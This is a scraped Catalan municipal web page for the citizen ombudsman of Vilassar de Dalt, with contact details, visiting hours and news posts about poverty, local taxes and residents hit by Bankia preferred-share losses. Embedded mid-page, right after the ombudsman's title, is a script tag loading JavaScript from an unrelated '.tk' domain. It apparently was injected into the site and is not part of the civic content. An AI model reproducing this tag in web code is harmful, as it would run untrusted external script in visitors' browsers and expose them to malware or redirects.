Defensa Ciutadana de Vilassar de Dalt

Dades de l'entitat

Nom
Defensa Ciutadana de Vilassar de Dalt
Adreça
Plaça de la Vila, 1, baixos
Codi postal
08339
Població
Vilassar de Dalt
Comarca
Maresme
Telèfon
93 693 14 16
Adreça de correu electrònic defensaciutadana@vilassardedalt.cat
Àmbit
social
Data de constitució de l'entitat
13-11-2012

Qui som

Xaro Mariscal Pablos

Defensora de la ciutadania<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Informacions

Horari de visites

A l'edifici de l'Ajuntament de Plaça de la Vila, 1.
Cada dimecres de 9 a 11 del matí.
Concerteu visita al 93 693 14 16.

PASTÍS PER A TOTHOM

17 d’octubre Dia Internacional per l'Eradicació de la Pobresa,
No cal estadístiques, ni fotos de països llunyans per saber que la pobresa traspassa la frontera de la dignitat humana. Només cal desplegar el diari per veure les necessitats de la població per sobreviure a la gana, al fred, a la ignorància, al respecte... i només cal obrir la finestra per contemplar la indigència dormint entre cartrons, remenant contenidors o parant la mà davant dels serveis socials en el millor dels casos.

Llegeix més

ARA CIVISME: IMPLICA'T

Es posa en marxa una campanya que dóna resposta a les queixes del 2013 d'un elevat percentatge de vilassarencs i vilassarenques.

Llegeix més

Lluny de la pau i el benestar social

Cal llegir de forma activa i reaccionar
Lluny de la pau i el benestar social
10 de desembre de 2013 – Dia dels Drets Humans

La Declaració Universal dels Drets Humans compleix 65 anys, però no es pot jubilar perquè moltes persones encara viuen temoroses i en una situació de precarietat, suportant menyspreus.

Declaració: reforma de la normativa de règim local

Declaració del FòrumSD (síndics i defensors) davant les propostes de reforma de la normativa de règim local.
En els darrers temps, des de la nostra posició com a síndics municipals, assumint les nostres funcions de protecció i defensa dels drets de la ciutadania en la proximitat de l'àmbit local, observem amb una gran preocupació el projecte de Llei de Racionalització i Sostenibilitat de l’Administració Local

2014: MENYS IMPOSTOS I BEN REPARTITS

Com a ciutadans tenim dret a saber a on van a parar els nostres impostos al nostre poble i per què cada vegada ens fan pagar més tot i saber que estem en època de crisi. Molts sospitem que es malgasten els diners de les administracions perquè no s'optimitzen recursos i cal mantenir unes infraestructures que se'ns escapen de les mans i no són necessàries. Aquest és un tema que preocupa als vilassarencs.

Llegeix més

ESCOLTAR I ACTUAR

Fa sis mesos que vaig començar a actuar com a Defensora del Ciutadà de Vilassar de Dalt. És una tasca satisfactòria quan pots donar resposta als vilassarencs i vilassarenques que vénen a plantejar les seves preocupacions i queixes perquè se senten ignorats. I quan veus que hi ha gent que s'estima el seu poble i aporta idees per millorar la convivència.
Com a Defensora, i amb l'ajut de l'Atenció al Consumidor, s'està donant suport als "afectats per les preferents": emplenar els documents per a l'arbitratge de Bankia, reunions informatives, informació directa...

Llegeix més

NOVETATS PER ALS AFECTATS PER LES PREFERENTS

REUNIÓ INFORMATIVA
DILLUNS 13 DE MAIG A LES 8 DEL VESPRE AL MUSEU
La Plataforma Estafablanca ha publicat una guia per ajudar a fer la sol·licitud d'arbitratge. La podeu seguir a adaptar al vostre cas concret. Si teniu dificultats us explicaré el proper dilluns com fer-ho i us ajudarem.

A continuació us publico un comunicat de la plataforma:

Llegeix més

INFORMACIÓ PER ALS AFECTATS PER LES PREFERENTS

Als diaris de dissabte 20 d’abril va sortir com a última notícia que molts dels afectats per les preferents poden anar a l’arbitratge sense necessitat d’advocats ni denúncies i molts podran recuperar el 100% dels seus estalvis en dos o tres mesos.

Llegeix més

REUNIÓ INFORMATIVA

Tant l’Ajuntament com Defensa Ciutadana estem esbrinant tot allò que pugui ser d’utilitat al afectats per “preferents”.

El proper dia 12 d’abril a les 8 del vespre al museu (Can Banús) farem una sessió informativa sobre el tema Preferents i les possibles vies d’actuació.
Espero la vostra assistència i que ho feu extensiu a les persones afectades que conegueu.

Notícies d’interès:
La FUNDACIÓ HOSPITAL ha obert un servei d’assistència sociosanitària per donar suport emocional als afectats.
Tel 93 741 91 60

Llegeix més

120 vilassarencs estafats per Bankia

A Vilassar de Dalt tenim 120 famílies estafades pel tema "Preferents de Bankia". A l'oficina de Defensa Ciutadana s'ha obert una llista amb el nom dels vilassarencs afectats per tenir-los informats de les actuacions i fer força comú juntament amb els afectats de Mataró.
Les persones estafades són principalment treballadors "formiguetes" que volien gaudir d'un raconet per a la jubilació i ara no tenen res perquè van confiar en els "experts" banquers que els aconsellaren on havien d'invertir. I ara no tenen res i, a sobre els demanen els interessos.

Llegeix més

Pàgines